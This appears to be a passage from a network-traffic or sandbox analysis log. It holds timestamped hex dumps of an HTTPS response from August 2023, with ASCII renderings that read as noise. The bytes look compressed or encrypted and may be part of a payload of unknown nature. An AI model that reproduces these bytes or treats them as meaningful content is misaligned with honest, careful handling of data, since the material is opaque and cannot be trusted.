4a b0 e6 e8 ed b2 2f 0d cf 16 f5 51 2f dc 00 fc e8 5f 46 f1 74 17 ed 79 52 34 74 38 f7 ba e5 0b 5d 8f 63 a4 23 00 30 ec dd 77 61 44 cc 69 11 20 48 dd bc 03
                                                                                      Data Ascii: Z/x)<m*?D_Q)jjvW|/)q]GJj%cI(_|/Jr_x0XtP9/FOxH?^c\XulQ&]_.bPTW.wWX$b-0u2=,KsfmcM)ngZRQFYJ/Q/_FtyR4t8]c#0waDi H
                                                                                      2023-08-04 16:48:40 UTC2278INData Raw: 7c ab 4b 7a 6e d2 80 b6 80 95 24 9f d8 a5 64 5c 88 1b 9f 60 08 0b b8 c0 a8 34 49 30 7e 7e 5e a7 be 3f 5e 28 bc 3b da 8a 12 86 09 59 44 fd 5c b1 06 6e 8a ca a2 46 dd 48 f9 72 cb 8b 46 7b 71 5f a2 2e f1 74 77 80 05 c3 88 b3 0c eb ce b8 3c b9 af 28 e5 9c b9 af 34 b9 11 0f 71 98 4c c5 a8 8d 02 ca 02 e8 63 34 cf bc 9b 3b 5a e3 ed 1e 4c fb 12 62 cb d5 81 51 ba 97 e6 54 d7 7b c7 ed b7 c9 6c 2c 0e 69 51 a5 80 6a 38 06 90 73 91 a7 ba 59 5b d4 29 fd 07 87 b5 8d 3a 23 87 0c 5e 26 96 7c 3a b2 56 8f ff d0 25 0b 6d 1b 22 f9 83 f1 69 42 16 5d b9 c1 2d 1f 77 42 c0 05 3d 42 eb 75 09 d1 31 c4 35 ed 3a 70 2e 06 f3 11 2c 39 7e c5 ba 0d b8 00 21 0e c6 2f 1a aa da 9f 07 a2 f9 01 7f 1d d8 e0 be 1a ef f7 0b 47 ef a6 76 2f ec f4 c3 18 93 c2 7e 47 36 be 5f 6f d9 ca 4d 74 11 42 52
                                                                                      Data Ascii: |Kzn$d\`4I0~~^?^(;YD\nFHrF{q_.tw<(4qLc4;ZLbQT{l,iQj8sY[):#^&|:V%m"iB]-wB=Bu15:p.,9~!/Gv/~G6_oMtBR
                                                                                      2023-08-04 16:48:40 UTC2282INData Raw: 5c 26 7a cd 8b fd f7 ba a2 d6 09 ba fa 96 89 ef 22 97 6e 5a 67 47 25 cd 6b e3 85 5e a4 f3 cb 20 56 9b f5 02 aa 11 22 85 f4 66 c1 e0 5f ac 26 8a 90 4c 4d b7 fe a8 ab 89 10 3a 5b 31 2a d1 89 2e 1b b7 47 50 d0 e1 50 f5 fb 74 45 57 18 62 76 5a 83 29 5a 1a 35 cb 7e 87 f6 51 87 c3 85 11 f6 a4 37 a2 cd dc a8 38 ee 81 6b cb 33 98 ad 9b ee 46 f6 03 fc e5 79 b7 c5 7f 9a 70 c2 ea 4b c5 da eb 70 83 3f fa 02 0e e1 b6 54 61 80 f9 91 6a e7 1a bb d7 6c 67 ea d4 f3 91 15 ea 39 13 cc 77 44 41 cd 20 0b 5a ca c4 00 1c e6 d9 d8 ff c5 69 2b fd ce 53 44 fe e5 48 ed e0 a1 28 9c 65 8f 8f 94 ef c0 eb 19 9e 89 5b b8 9b b5 ed f6 82 8d 15 be a2 be 8a 2a c4 2c 8a cc 86 b6 42 f7 f3 d2 b8 58 f7 83 3e 90 a9 37 30 49 e4 70 d8 97 db d5 d4 04 a4 17 4f 52 87 a3 64 18 1e d6 6c 9d c3 db b4 45
                                                                                      Data Ascii: \&z"nZgG%k^ V"f_&LM:[1*.GPPtEWbvZ)Z5~Q78k3FypKp?Tajlg9wDA Zi+SDH(e[*,BX>70IpORdlE
                                                                                      2023-08-04 16:48:40 UTC2286INData Raw: 4e 61 6a a6 df e4 c6 30 7e 5b f7 dd 1f 17 2f e6 3b 1b 63 e7 ab bc 69 7d cf f2 8a 2c 57 a5 5f 24 7d 28 0e bc f5 54 c4 49 d7 42 ab 1c 27 03 c2 f8 aa 63 ad de 33 ed b5 f8 98 f8 e7 cc 27 0e 01 ee 1b 0b ec 7a d6 19 34 58 cb 93 e2 a7 77 f3 1d 67 e3 5d ae fc 7b 39 26 9f 7b f7 8c 1c 83 5c ea 31 f5 69 0f eb c5 96 97 5a c8 89 4e 52 8a 22 92 3a bc 03 c6 7a b2 a9 fc fe 7e cb 9d 48 48 9d dc f5 16 e8 a2 df ef 77 2e 39 c7 d7 3d b2 81 d0 ec df 35 1b 59 ed d5 15 05 d5 c5 04 42 21 12 1f 3f b6 6a 49 3e 8e 56 99 43 78 16 f0 68 d0 1f 0f ac de 2f 87 52 d7 5c bf 02 82 ff c1 d5 de f0 ac 04 12 03 95 9c 15 ac d3 4c 0e f7 05 c9 55 48 bc ea 4f 87 c3 23 5c 55 72 2b 29 8c 7e 1a ea a0 ef 32 f9 bb 78 a3 a6 3a 40 42 7e 64 87 c8 4b b7 6f 8c 04 9f 15 77 5a 54 bf 9e 46 bb b0 b2 c3 e8 a4 8e
                                                                                      Data Ascii: Naj0~[/;ci},W_$}(TIB'c3'z4Xwg]{9&{\1iZNR":z~HHw.9=5YB!?jI>VCxh/R\LUHO#\Ur+)~2x:@B~dKowZTF
                                                                                      2023-08-04 16:48:40 UTC2290INData Raw: 45 6e 19 58 e0 26 d8 4f 43 0b 5f 00 af eb 29 ed a0 9e 54 be 51 00 1f 22 d9 83 33 c5 83 ae 8a 29 06 7c f7 e9 aa 4e 4c 20 0e 91 8e a0 53 bd e7 90 02 e9 5a 34 a1 e5 82 40 f6 8f 5f bb 9c 22 e6 37 f9 38 89 f6 10 cb 35 16 ae b1 a5 36 1b 33 d9 14 41 4e 3b b8 cd c6 2a 75 94 4d 80 09 1e e5 6e 1e 63 55 6d 74 fa 54 25 b1 c5 27 45 7d 7e b0 e0 c0 9e ef e9 01 71 eb 52 90 80 82 0d 96 45 ce 06 cf 87 2f 46 fd 3f e2 05 24 df b7 33 8c cd 8f 5a f1 8a 61 23 ae 81 a4 bb ea 21 2b 65 af 4b a7 1f 6a 7a ae da ec c8 12 f4 1a c3 f2 26 57 bd 44 6b 8a 7c 4e 6f de e1 c2 c1 c2 86 6f cd 69 9e a7 5a 7c 1b 2d e4 a0 04 79 01 7c 4e 54 f8 aa 70 c2 73 52 5d f8 07 3b e5 24 24 32 53 d2 47 b5 34 47 53 92 4b 6b 88 cf 6a c6 97 4b 8d d6 0d b7 ef 79 5a e1 fe f3 79 ee 97 62 cd 65 f5 d3 31 db 14 47 a1
                                                                                      Data Ascii: EnX&OC_)TQ"3)|NL SZ4@_"78563AN;*uMncUmtT%'E}~qRE/F?$3Za#!+eKjz&WDk|NooiZ|-y|NTpsR];$$2SG4GSKkjKyZybe1G
                                                                                      2023-08-04 16:48:40 UTC2294INData Raw: 62 15 5f 51 71 c3 b6 a9 33 2e 31 eb a5 fc ca a3 c8 c1 4c cc 8e 1d 82 86 1d 06 74 27 c5 72 da 9f 40 4d b1 91 82 fe af 2e e5 8c 07 0e 74 60 fd 6e eb b8 e4 9b 81 13 7c eb 8c 65 65 f9 21 52 5c f4 fb e5 d7 02 06 ce bd 49 01 79 29 c6 42 a5 82 71 16 ed 21 6d b4 92 45 bb ed 36 2e 5a 3d 65 e9 06 bf d4 7b 80 8c 9b a8 f8 ec 4a d5 9c b5 e1 95 34 76 89 e5 9f d3 80 52 43 7e 89 80 93 44 92 82 93 f3 9a e3 87 c2 10 29 3e 14 8f 53 9b f1 6d e2 6e 76 4a 8c 03 77 92 a8 d6 e5 a3 f0 c3 64 dc e8 cc 3b ef 48 a8 29 d4 c1 48 b8 ea 8b 68 5b 2b d2 1d 86 e7 d8 be 01 3d d6 ef 7a c3 31 eb 6d 3f 63 fc 49 84 9a 1e 6f 24 3d 9b 8f 0c b1 22 04 f8 2f 39 a7 06 4e d5 3e 79 d5 5f b7 ad 66 09 d0 35 5c fc 55 cc 5e 41 a8 c4 80 c4 0b 5b 06 c6 a1 65 cf a5 4d a6 9d d0 22 c0 d7 2b d8 60 86 c9 56 54 b9
                                                                                      Data Ascii: b_Qq3.1Lt'r@M.t`n|ee!R\Iy)Bq!mE6.Z=e{J4vRC~D)>SmnvJwd;H)Hh[+=z1m?cIo$="/9N>y_f5\U^A[eM"+`VT
                                                                                      2023-08-04 16:48:40 UTC2298INData Raw: 37 8d 38 be b6 e3 18 87 ad fb 0a 2a d9 f6 4e 64 23 88 ce c9 f2 16 5e 6f 1d 1a 8a 15 87 8e 87 44 dd 50 32 b0 6f a5 39 f9 52 be 4e d3 89 95 1a cc 43 39 08 38 b7 f8 a6 b5 55 a4 d8 12 ef d9 1e 0a 64 0e e6 e4 33 ab 2e 15 ac f8 c1 13 cc ae 72 5e 8d fd c2 8d 59 06 ea d3 d6 78 2e a2 0b b5 41 30 73 42 07 2c 19 c5 f0 47 fa 56 17 58 13 54 e4 88 d1 6d 6b f1 c9 fb 72 14 94 e3 30 d1 48 5e 93 2b 43 97 a1 25 04 59 a0 fa d3 15 f0 31 27 0a ea d4 01 14 a8 c9 87 86 07 27 ca f4 65 d9 26 17 be 03 96 ee a3 12 78 48 8b bb 91 f2 6b ff f4 3d 63 ff 0d bf 84 77 18 38 f3 f0 c0 b5 60 00 56 5b 48 70 45 6e 2f 0b 26 b4 c1 40 09 f8 c7 32 83 d9 f1 0e 70 e7 6b 3c cc f3 fb c9 d8 53 c9 4c 38 7a d9 69 71 65 11 90 ed f3 8e 6b aa 97 e2 bf d8 78 08 b3 57 ce 18 15 e6 81 2e e5 ad 4d b3 17 bf 14 8e
                                                                                      Data Ascii: 78*Nd#^oDP2o9RNC98Ud3.r^Yx.A0sB,GVXTmkr0H^+C%Y1''e&xHk=cw8`V[HpEn/&@2pk<SL8ziqekxW.M
                                                                                      2023-08-04 16:48:40 UTC2302INData Raw: af 59 11 4c 79 f4 2d 71 c6 50 6d c9 34 00 6b 0d f5 ff 25 d3 c9 56 ff b3 e2 d8 83 a9 17 e3 ff 6f ba 82 10 fa a0 6d 51 11 ea 1e 5a c2 e8 85 a2 70 29 c1 77 87 75 c1 10 cc 66 a4 9b 8a fe 2a 1c 51 dd 99 bd a2 6a 95 a0 70 46 8e 02 53 97 0f 1a ab 52 0b bb 51 12 1c 8b c2 fb 6a 50 c1 c3 99 86 97 75 1d fc 6b 82 e4 10 1c 7a 54 ea 42 7c 32 99 9e 54 30 89 33 f8 8d 06 1f ac 57 f3 28 c2 3b 70 7e 8b 07 23 9f e8 a8 a1 43 d0 61 b9 b6 c4 5d 32 c0 a2 96 c0 2a aa 60 fd 6f 36 37 7d 15 b8 21 b8 e5 67 82 d1 ed 8d 46 ce 2c fd 59 13 5b 7c 5e 43 5c 0a 49 4f 6f 60 91 d2 17 36 6e 27 de 80 ba bb a3 57 ce 9d 7b f5 91 c9 36 fc 62 ec db 46 4e 6e 39 6c 53 78 37 f8 f9 90 e9 5d 7b 53 93 fe 44 4a e9 e8 27 30 bd ca 44 ef 32 29 64 e1 53 c9 47 df 90 25 d1 24 87 e0 c0 81 19 27 6f 7b 93 37 49 87
                                                                                      Data Ascii: YLy-qPm4k%VomQZp)wuf*QjpFSRQjPukzTB|2T03W(;p~#Ca]2*`o67}!gF,Y[|^C\IOo`6n'W{6bFNn9lSx7]{SDJ'0D2)dSG%$'o{7I
                                                                                      2023-08-04 16:48:40 UTC2306INData Raw: 21 26 4a cd 67 99 90 d5 6e ed 7b 01 5b 78 b9 ba 2f 32 e9 00 ed f8 60 7a e8 ab 93 a5 60 c9 38 cc e6 a9 ac 47 f6 22 78 49 3f f3 7e d7 a0 99 d5 03 f8 f8 d0 c2 ed 58 f9 92 09 3a 3a 5b 9c e8 95 a2 d6 87 c5 86 94 3f b3 77 aa 9b 84 c7 a9 ed b4 61 a4 81 d9 1d cb 13 15 35 c5 cf f2 75 13 6a 0c 5a 5e 54 12 fe 8a fd 27 be 56 57 34 64 84 dd 83 3d b1 86 5b a7 d1 40 bc a6 f6 bb 4f fc 30 23 b4 4b 92 b5 5c 94 ea 3c f4 8c f4 63 5c 36 4c 29 60 29 c3 63 df 1e 2e c4 3d 52 4a ec 66 29 83 7a 01 f7 1f 8c 77 32 d8 3a 71 3d f7 20 d4 37 c6 88 eb 65 6e 08 e1 b6 0b 83 a5 7c a2 06 32 a5 9a f3 67 fb 8a 9f 63 22 a8 d8 c3 f0 c0 ba 5e 96 71 b7 1c 8d 0d 50 7b 28 0f b4 71 e4 d6 37 f2 41 fd 20 5b 2c 9f 74 20 22 35 a5 e9 2b 83 23 e1 2d 02 80 e4 2b 4c fa 3f 9f b9 4d 7b fe da 6d 01 0d 91 96 93
                                                                                      Data Ascii: !&Jgn{[x/2`z`8G"xI?~X::[?wa5ujZ^T'VW4d=[@O0#K\<c\6L)`)c.=RJf)zw2:q= 7en|2gc"^qP{(q7A [,t "5+#-+L?M{m
                                                                                      2023-08-04 16:48:40 UTC2310INData Raw: 04 97 93 94 d2 2c 86 af c7 20 5c ba 1e 30 07 e2 aa 2d ad 9a 3a fe 1e fe 5a 31 85 75 0d bb 95 9b 62 bb e8 61 62 1c d4 36 e4 22 c9 dd 2c 05 7b b6 b7 e1 2d 8d 3a 28 e7 c0 bd e0 f1 b8 de 91 25 74 3f 03 d3 fd 47 77 80 58 bf c2 44 be e4 04 d4 f3 68 f5 ea cb 82 02 08 85 d0 1e d6 ae 31 23 91 13 36 f1 4e 9d 51 c3 e5 55 6e 60 a9 fd b4 03 c9 fd f4 fc 2c 9e db 7e fe 8d cb dd fe 1b 77 7b 1f b7 c7 87 3c 0b 56 31 bd 47 f6 5c 4f 87 ac 4c 2f 8c 4d 0c 88 06 64 75 f5 11 80 a9 d2 c3 3c da 5a aa 83 15 7e ff 1b 2a 3b 19 96 88 bd a3 7b f0 ee b1 9e 75 14 82 44 1a 92 10 aa 45 26 69 fa 1c 70 d7 05 74 31 2a 35 f7 69 6d 34 3a d3 43 87 d5 51 6b 8e a3 b9 b3 38 21 97 3b 36 47 b1 c6 75 62 4f 31 2a 46 53 7a cf 73 74 9f 25 73 f7 0b 1f 48 9c 74 8f 99 db ec 32 b7 5f 00 bf 60 43 ed f8 7a 02
                                                                                      Data Ascii: , \0-:Z1ubab6",{-:(%t?GwXDh1#6NQUn`,~w{<V1G\OL/Mdu<Z~*;{uDE&ipt1*5im4:CQk8!;6GubO1*FSzst%sHt2_`Cz
                                                                                      2023-08-04 16:48:40 UTC2314INData Raw: 7a 88 93 89 9b 22 04 7f 2d 1a f2 09 73 6c a1 78 34 3d cf 06 82 ab 46 c2 fb 07 60 cc 13 42 7f e1 8f 20 a7 56 c4 3e f3 04 1e 5b fa 2d 65 fe 63 12 ed ed 7e 82 9d ec b9 7f da 59 69 b7 6c b5 df c8 38 61 83 4c 05 e4 3f f5 95 f2 e4 00 9d 39 ea f6 d8 6e d1 3d 37 16 a1 ab 3e 4b 21 13 39 01 75 60 8a 4d 99 9b 33 93 ef c4 e1 39 98 cc 02 d6 44 db 60 23 e3 ab 03 bd 96 94 08 5a 88 55 11 4a f3 33 6d 7e 3c f2 ea c8 6c 26 f2 68 5b 6d 01 c8 c6 a3 f6 6b 59 66 1d 39 be 9d a6 a8 e6 cd 08 62 e9 d3 5f a5 86 2b 42 2c ff e5 53 63 1e 03 0a 9d d4 5a 6b 66 e9 44 90 bf 5f e6 15 ee 64 e0 26 db f3 ee f2 5c 66 dc 4c 2e ea 9a e0 c6 da 14 60 58 ec 33 64 09 b7 9c 53 e6 81 b4 3d 32 21 8d c8 a7 8b f4 d1 12 58 64 10 1c 28 9d d7 1d 17 88 2c a0 db 61 30 38 cd 77 38 6f f1 5f 98 56 6a ba 15 d4 55
                                                                                      Data Ascii: z"-slx4=F`B V>[-ec~Yil8aL?9n=7>K!9u`M39D`#ZUJ3m~<l&h[mkYf9b_+B,ScZkfD_d&\fL.`X3dS=2!Xd(,a08w8o_VjU
                                                                                      2023-08-04 16:48:40 UTC2318INData Raw: d0 44 8d 3f e0 5c 24 d0 fa 75 93 b6 be ad b1 63 1f 88 4f 0e 0e 48 97 55 2e db b3 ca 2d 7d 42 84 e5 fc b4 b4 38 ee b5 b1 7b d7 f6 a8 a7 6e 53 9a fe 04 98 47 1f da d9 be 2e ab f7 01 37 a2 89 19 11 b3 a9 02 57 ed a9 70 fc ed 27 67 51 8c a8 e4 0b 09 30 f9 77 75 ef db 38 3d 3b 36 63 9d 43 c7 94 6b ba 6d 48 bb 80 46 fb c7 f3 cc 69 1e 0f 36 31 88 62 05 84 dc 03 05 62 23 50 20 0f f1 11 c1 52 80 20 37 a7 88 13 d8 fa a4 e4 46 0a 30 56 e6 81 8d c9 75 90 12 a9 b3 6b 9f 0a 36 6e 8d 7a 9c 7e 30 89 1a 7d b2 b9 e9 5b 16 24 f0 b4 70 a8 66 3f 73 16 62 50 ce a1 c7 c7 a6 80 99 0a a3 bd 2d e0 4a 5d 52 fb 13 79 f1 3d 22 54 5b d1 03 24 d4 f6 16 a0 b7 f9 dc 85 c8 66 9c c8 2f 8b 49 85 a0 53 30 f6 e2 c0 9d fd bc d8 4f 58 8b bc ca 37 4a 0b f9 55 54 37 5e 5f 79 7e 80 32 7d 22 3c 7a
                                                                                      Data Ascii: D?\$ucOHU.-}B8{nSG.7Wp'gQ0wu8=;6cCkmHFi61bb#P R 7F0Vuk6nz~0}[$pf?sbP-J]Ry="T[$f/IS0OX7JUT7^_y~2}"<z
                                                                                      2023-08-04 16:48:40 UTC2322INData Raw: f1 3f 8c c1 80 d4 ea 06 81 60 03 ac 6b 1d b0 3e 26 b8 2c 9a 26 9b c8 46 20 3c a5 ce 43 2a 47 0e ac 19 41 b0 09 f2 34 f4 bb 77 ac df a3 d3 e8 cd ba 36 f7 9b 3b 40 8e 98 b6 07 9a cc 16 27 ae f2 ba c0 40 19 c2 6d 65 10 ea 9e cb 85 44 63 81 01 69 62 cd 69 f9 cc db d7 fa 20 41 be 25 a6 21 57 42 8a c4 1f a9 36 2b bc cf 5c f6 21 c4 df 07 11 81 b5 c3 f6 33 f5 e0 45 a0 74 08 bb 12 90 93 39 4c cb f8 7a a6 9e bc c8 ee 77 2a c0 52 15 95 26 bb 51 38 44 56 1b 8a a4 f3 bd 9e 94 af c3 63 59 dd a5 28 4d 62 b0 af 20 37 87 5b 6d 24 20 fc 4a 7f 10 8a 93 7e 9e a2 c1 0f 19 06 f5 e9 50 27 ed 12 5a 0d bf 94 83 4c b4 4e d5 a1 e7 79 8c d6 5c f6 52 3c b9 68 8a d1 7d 00 7e eb 2b 13 78 a5 f3 7d a8 c1 84 de f2 bc 15 92 eb 9a 38 c3 73 ba 1a f5 72 1a d2 f8 79 44 3d 77 eb cd 61 96 51 60
                                                                                      Data Ascii: ?`k>&,&F <C*GA4w6;@'@meDcibi A%!WB6+\!3Et9Lzw*R&Q8DVcY(Mb 7[m$ J~P'ZLNy\R<h}~+x}8sryD=waQ`
                                                                                      2023-08-04 16:48:40 UTC2326INData Raw: 3b a0 d8 a0 c8 31 c5 ef d6 c9 c1 75 9e e4 39 b0 cb 02 08 65 b0 47 77 64 89 b8 31 a5 1e f5 3d 88 f7 9d f7 5c b7 98 95 0a 48 64 ef e8 04 4e 70 65 93 fa 9b a4 93 38 2d 12 ee 71 a5 df dd 0f fe 3e 04 9f 9b 7b 26 b9 f2 5c 2a a4 be b1 cf f4 bd 73 2e 95 06 b9 12 5c 4b 57 a4 2b 54 16 a8 2b 0b 87 4a 56 1a ad f0 06 3c c3 65 ff 57 53 c8 6b 24 c5 08 de 61 fa e2 f7 2b 52 82 c5 71 43 2f 52 3d df dc 58 9d 75 d8 28 fc b9 98 20 38 6f c3 da 94 dd 98 92 f7 c7 f2 cf 0e d6 f8 a6 56 9d e4 cf 2b 53 91 1f ba 42 95 06 ef e1 ff da e2 24 2a b3 c3 9f 56 00 41 72 8d 38 83 9a 67 06 c9 41 76 74 3d f4 40 0e 72 b0 a2 c0 03 02 d5 7c cb 80 1c 18 fc 45 e1 6c 76 6c ec 25 b9 60 b0 4f 68 20 80 41 83 b7 1b 0a eb bc 96 aa 09 d6 a1 de fc 59 da f7 b4 98 5e fe d2 8b 89 e8 60 70 85 ae 26 88 b5 06 8f
                                                                                      Data Ascii: ;1u9eGwd1=\HdNpe8-q>{&\*s.\KW+T+JV<eWSk$a+RqC/R=Xu( 8oV+SB$*VAr8gAvt=@r|Elvl%`Oh AY^`p&
                                                                                      2023-08-04 16:48:40 UTC2330INData Raw: c0 f8 f2 68 ca 3e e9 e4 9c ee ab 08 e9 08 1a 0c 31 33 8e c9 5f 88 65 d9 22 fd b5 07 03 11 e4 57 99 6f 9c e7 4c ca d0 35 59 63 88 3f 08 cc 20 2e 6f b1 11 31 88 7c d8 ea 68 c1 3a 47 b7 06 29 97 ee d9 af f2 7f b9 00 d0 d5 c2 c2 7d aa bf 08 d0 d2 c2 5f d5 2e 0d ac 42 33 a9 b4 5a 08 af e7 ac 6a 4d 2b 27 c6 1a 71 1b 56 17 b9 75 83 08 6e 03 bf b7 5c d3 1d 65 b9 bd 0e ea 86 03 68 7e a7 2f 2e ff d7 5b 81 97 06 72 9b 76 8b b4 5b d9 df 1c 2c cd 21 05 04 4d be 17 fe ff 03 1c 6f 78 c6 c9 74 03 60 0e 42 71 a0 9d d0 cd ea b8 4c 07 87 a8 53 86 a7 9e cd 8d 3d 4f ba 26 90 0d a6 6d 18 c2 97 49 a3 61 cf 0e 2a 8d b7 18 e8 60 64 fa 0b 5c e3 f0 74 dd cd 8b 00 43 6e 19 3a 51 68 b8 99 c8 2e 5c 09 5a 54 3e 5a a4 50 1d dd 59 7f 8c c2 f9 28 60 96 35 cd 03 c7 3f c1 28 5b 87 e3 13 4e
                                                                                      Data Ascii: h>13_e"WoL5Yc? .o1|h:G)}_.B3ZjM+'qVun\eh~/.[rv[,!Moxt`BqLS=O&mIa*`d\tCn:Qh.\ZT>ZPY(`5?([N
                                                                                      2023-08-04 16:48:40 UTC2334INData Raw: 9a 36 18 41 55 81 0e 12 16 69 c3 56 e5 d8 2c 13 37 d3 70 30 ca 9b c0 e0 7f 05 4b 38 fb 71 a9 08 56 5b 01 fb c1 f6 8a a6 e4 dd cb 24 16 ff b3 11 91 63 bc 29 23 ea 8e 24 7e dc 71 13 49 0d b6 f3 a3 b6 d8 35 f4 0a 39 87 0b e5 1f d0 b4 f2 3b 72 ad 28 f1 8e fe af c2 e5 c1 73 3a 62 2f 24 90 31 e1 37 77 57 0a d7 b3 89 a8 f7 1a 46 29 ad 7e ff 8f df 84 a5 d2 75 03 7f 15 6e ae bf 03 d2 de b3 73 88 36 68 40 90 8f 8b c8 50 da d3 93 9d 6c 77 6f 33 40 5f 56 88 05 46 b1 e2 17 a6 b7 7e 23 8e 06 9c 62 f4 43 d3 98 1c 6f 58 d6 b1 da 8a 8a 1c 57 58 3c 7e ab c4 d6 c9 ac 9e 82 ae b8 d7 8f 1a e6 1b b4 1a d1 71 16 e2 0f c6 93 0e bf 5c cf eb 17 7f 09 e1 53 3e b1 0b f5 85 4d a0 35 c8 1e 0f 4c 51 94 98 3a b7 63 51 21 5f e3 a8 49 7f cb fe 6b d7 29 c7 b4 83 7b 70 0d b5 a6 d6 e2 92 ca
                                                                                      Data Ascii: 6AUiV,7p0K8qV[$c)#$~qI59;r(s:b/$17wWF)~uns6h@Plwo3@_VF~#bCoXWX<~q\S>M5LQ:cQ!_Ik){p
                                                                                      2023-08-04 16:48:40 UTC2338INData Raw: 1e a0 b9 ea 10 ab 99 10 40 5b c1 e1 4d 98 3a 41 85 6e 56 e7 e0 e4 1e ff 88 b4 ec f7 32 2a 48 81 a0 aa 65 4f a5 b2 e1 f2 43 6b 15 f9 fd 4b 02 e6 21 f1 d1 84 5e 92 15 e8 75 83 b6 48 96 57 3c 2f 84 83 19 0d 1c 42 39 fd fd e6 93 f8 3e f4 d2 7c a5 da 2e f3 2c 5e 79 45 04 55 35 bd 7c f1 0a 64 b0 b1 49 8f 1a c7 14 18 2a 76 bf 9e 95 dc 76 54 be aa 79 95 81 33 17 a1 e2 f5 d5 40 f4 88 e6 d8 ea cf a6 b7 1b b7 54 6d 5b 9f eb 0f 67 28 03 46 dd c9 88 44 a3 a4 4b d5 46 1c 8f c5 f3 a8 b9 98 1b ac 4d 71 61 ff 16 34 54 14 b4 42 19 f0 64 2f bf fa 1b 18 02 a4 04 94 d9 5f c0 26 17 af 63 ac 37 22 7f 22 23 57 a5 58 3b 97 62 b8 71 dd 29 9b 2f b5 1b ac a4 67 d6 82 6c 35 93 bc 2a 0c 7f 29 79 9d ee 78 a2 3f 6d a3 49 c7 39 f7 f0 d1 c6 89 bc 9b 44 dd 85 c6 71 07 09 6d 65 ab 93 ff 20
                                                                                      Data Ascii: @[M:AnV2*HeOCkK!^uHW</B9>|.,^yEU5|dI*vvTy3@Tm[g(FDKFMqa4TBd/_&c7""#WX;bq)/gl5*)yx?mI9Dqme
                                                                                      2023-08-04 16:48:40 UTC2342INData Raw: d5 56 18 4e 04 9a 00 43 cf 0c 73 77 e4 66 f5 64 db 43 06 99 1f 03 ff 34 83 ef 67 e1 2d c8 06 a8 40 89 50 25 07 cb 54 17 ac 7e a0 cd 18 84 a1 57 75 53 9b 6a 94 26 0d e1 17 1b 83 6b 82 9e d6 0c 79 2b 9d be 35 69 d5 37 9b cd 6c 03 2c 41 08 51 1f 8b ff 94 e6 78 6c ea 96 e4 88 29 89 1b b8 49 f8 2a 97 6a 71 79 b3 20 48 53 f8 7c 95 d8 db 2c 8f c9 1e d9 be 35 14 a8 78 56 40 d3 81 ed c2 60 82 49 7c 0f 2e 44 a1 12 d8 33 19 7c 38 f3 e5 d6 0a 2f 88 af 33 a8 f3 c1 c1 ff c4 32 bb c2 b0 1d 6a f2 a8 8d c3 86 6f b6 2d f4 b2 ce 8d 09 aa 5c 31 d2 4b 70 7d 23 33 18 01 95 d1 16 9f 66 ca a5 b4 2a d0 36 12 eb c8 a0 86 86 f3 a2 8c 0f 06 89 27 8e 79 c9 d4 e3 82 17 7f 76 fc 90 d5 e7 e8 ea d9 54 8e 3b 5f 50 02 dd 0b 40 9e d1 a7 68 ea c2 0d bb e2 09 22 cb d2 cb 31 48 66 32 01 59 c1
                                                                                      Data Ascii: VNCswfdC4g-@P%T~WuSj&ky+5i7l,AQxl)I*jqy HS|,5xV@`I|.D3|8/32jo-\1Kp}#3f*6'yvT;_P@h"1Hf2Y
                                                                                      2023-08-04 16:48:40 UTC2346INData Raw: 03 04 2c 33 22 ac cb a0 0b 15 49 e3 3e 53 de cb 32 ad 1a 1c a5 b3 71 ac b6 6c 53 ca d9 8f ad a8 da cb af ba c5 c1 7f 72 ad 4f 4f 45 08 89 f3 ac 64 ee 74 81 36 15 b3 af 0d e7 02 4f 2a 92 46 c9 dd d1 7c b4 02 fa 0b c9 2d 78 3c 48 a0 b0 28 a4 2b 4f aa 7a b7 22 f4 f5 e2 93 60 a9 4b 48 7e 02 97 da 6b 07 be fa 02 15 41 8b 56 c8 6f ca e4 f3 38 4c 43 da 90 67 28 59 24 a8 e7 a4 14 4b 73 40 65 2f 75 6c 9e 34 aa 28 88 9f 9c dd ae d4 9b e4 b7 a8 d4 aa 90 0b 4d 3d d0 9f 18 95 d5 95 0c e7 d1 2b 27 71 78 61 63 aa 2d 70 11 66 12 15 d6 6d bf dd b4 e2 8d 13 0f d0 7b 00 d8 a4 c4 30 26 7f 58 90 e8 63 d6 30 df 09 21 58 71 77 d8 2d 0d c9 eb 00 47 14 ef 1f 38 c4 ae b1 90 19 fe c7 06 51 10 53 fa 11 38 7e df 43 de aa f4 52 53 7b d9 94 78 6f 18 65 67 d8 e9 21 54 f0 f1 e8 77 d0 38
                                                                                      Data Ascii: ,3"I>S2qlSrOOEdt6O*F|-x<H(+Oz"`KH~kAVo8LCg(Y$Ks@e/ul4(M=+'qxac-pfm{0&Xc0!Xqw-G8QS8~CRS{xoeg!Tw8
                                                                                      2023-08-04 16:48:40 UTC2350INData Raw: 3d 7b 86 80 b9 74 2f bc 0e 3c a3 95 66 6f b8 59 3f 84 42 3d b1 a6 8a 0a 38 1f be c0 6e 40 5d 63 1d 94 e9 f0 8d 7f 4f cc 2f e7 04 f3 65 69 5a 7d e8 f6 56 55 98 ea 8f da 73 19 0c 7c 85 5a 4b 6b cd 47 aa f7 ba 26 74 43 8d 31 5d d1 d5 bb 1e 7a 82 5e 24 72 ee 36 18 a8 dd 86 ab 40 92 b7 77 4a 6b ec 15 44 08 48 e0 80 1c 8e b0 39 13 89 51 4b a8 24 ec cc f6 3e 86 ad 73 ed 37 a9 a5 4c f4 70 18 8b df ad 7a 34 52 36 ed 60 e8 20 f0 21 8f 70 bf ff 5e 67 ff 25 19 e4 4c a8 05 9b 5d 58 43 dd bb 77 b7 72 c0 f4 91 28 91 eb 27 8b e7 5d fc 3a 27 7f 87 be 21 2f 73 44 74 c1 b5 73 cc 79 e5 e5 80 6a 53 6c 22 62 96 73 21 8e 11 e2 6e 03 01 c9 92 d8 f8 c0 95 c6 9d 37 a2 6a cc c0 de 3d 1f a1 8d 59 eb a3 5e f3 8a 55 34 5e c7 86 2f 02 22 c4 79 e8 f9 42 6d c0 71 c3 c4 22 f2 ef 0a aa aa
                                                                                      Data Ascii: ={t/<foY?B=8n@]cO/eiZ}VUs|ZKkG&tC1]z^$r6@wJkDH9QK$>s7Lpz4R6` !p^g%L]XCwr(']:'!/sDtsyjSl"bs!n7j=Y^U4^/"yBmq"
